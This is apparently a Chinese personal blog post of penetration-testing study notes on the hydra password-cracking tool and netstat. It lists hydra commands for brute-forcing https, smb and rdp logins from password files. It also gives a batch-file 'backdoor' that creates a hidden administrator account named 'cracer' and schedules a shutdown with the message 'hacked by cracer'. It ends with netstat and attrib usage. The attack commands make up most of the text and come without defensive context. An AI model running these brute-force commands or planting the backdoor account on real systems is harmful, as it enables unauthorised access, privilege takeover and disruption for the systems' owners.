满天星
Fork me on GitHub

渗透测试学习笔记03-06(3)-hydra与netstat

hydra:
一般可以爆破ssh密码
爆破https
# hydra -m /index.php -l username -P pass.txt IP https
爆破teamspeak
爆破cisco
破解smb
# hydra -l administrator -P pass.txt IP smb
破解pop3
破解rdp
# hydra IP rdp -l administrator -P pass.txt -V

->
映射盘符

->
留后门.bat
copy con c:\123.bat
net user cracer 123 /add
net localgroup administrators cracer /add
shutdown -s -t 1800 -c "hacked by cracer"
ctrl+z

netstat -an    --查看端口,及连接情况

attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的存档,只读,系统,隐藏属性;用+则是添加为某属性.
-------------本文结束期待您的评论-------------